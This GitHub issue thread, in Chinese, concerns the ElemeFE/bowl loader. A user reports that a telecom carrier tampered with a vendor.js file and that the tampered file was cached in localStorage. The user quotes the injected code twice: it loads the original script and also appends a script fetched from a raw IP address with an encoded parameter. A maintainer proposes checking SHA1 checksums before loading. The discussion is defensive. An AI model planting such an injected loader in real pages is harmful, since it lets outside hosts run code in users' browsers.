### ISSUE TITLE
js的文件内容被篡改（运营商劫持），而又被localStorage存储了，怎么处理？

### ISSUE THREAD

**Issue by mjj-Martin** [ElemeFE/bowl#24]
遇到过这样的一个情况，一个vendor.js,被电信运营商劫持，直接修改js的内容。被篡改的js代码如下

> var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://images.plateno.com/mall_static/js/vendors.1901b82521098c3663c0.js?cHVzaA=105658';
_atn_obj_.unified_url = 'http://121.15.207.224:3535/adv_select/ad_unified_access?SP=ABzs/PzoPOz8zPg7yXnpGRmpOgmJugy8vPzs/Pg86Dy8vPzs/Pg8/Nz8/Ny8rKyc7Jv87JzNGYm4PKxtHLzdHNzMjRzMyDzoPOz8rJyseDz4PPg5Kek5PRj5Oei5qRkNGckJKDzsvHy87MyMjGzIPNg88=';
window.setTimeout(function() {
    var a = document.createElement("script");
    a.src = _atn_obj_.oldurl;
    document.getElementsByTagName("head")[0].appendChild(a);
}, 0);
window.setTimeout(function() {
    var a = document.createElement("script");
    a.src = _atn_obj_.unified_url;
    document.getElementsByTagName("head")[0].appendChild(a);
}, 0);

由于被篡改，导致执行的顺序出错，出现异常。被篡改的js已被localStorage缓存了，下次访问会继续执行，面对这个异常情况，有比较好的机制去预防么？``

**Comment by mjj-Martin** [comment]
遇到过这样的一个情况，一个vendor.js,被电信运营商劫持，直接修改js的内容。被篡改的js代码如下
`var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://images.plateno.com/mall_static/js/vendors.1901b82521098c3663c0.js?cHVzaA=105658';
_atn_obj_.unified_url = 'http://121.15.207.224:3535/adv_select/ad_unified_access?SP=ABzs/PzoPOz8zPg7yXnpGRmpOgmJugy8vPzs/Pg86Dy8vPzs/Pg8/Nz8/Ny8rKyc7Jv87JzNGYm4PKxtHLzdHNzMjRzMyDzoPOz8rJyseDz4PPg5Kek5PRj5Oei5qRkNGckJKDzsvHy87MyMjGzIPNg88=';
window.setTimeout(function() {
    var a = document.createElement("script");
    a.src = _atn_obj_.oldurl;
    document.getElementsByTagName("head")[0].appendChild(a);
}, 0);
window.setTimeout(function() {
    var a = document.createElement("script");
    a.src = _atn_obj_.unified_url;
    document.getElementsByTagName("head")[0].appendChild(a);
}, 0);
`
由于被篡改，导致执行的顺序出错，出现异常。被篡改的js已被localStorage缓存了，下次访问会继续执行，面对这个异常情况，有比较好的机制去预防么？

**Comment by classicemi** [comment]
感谢反馈，这个确实是目前存在的问题，我们也在着手解决。
目前可能的做法是通过服务端的支持，返回资源内容的校验和(SHA1)，在加载资源前进行比对，如果匹配失败则判定资源失效并重新加载。
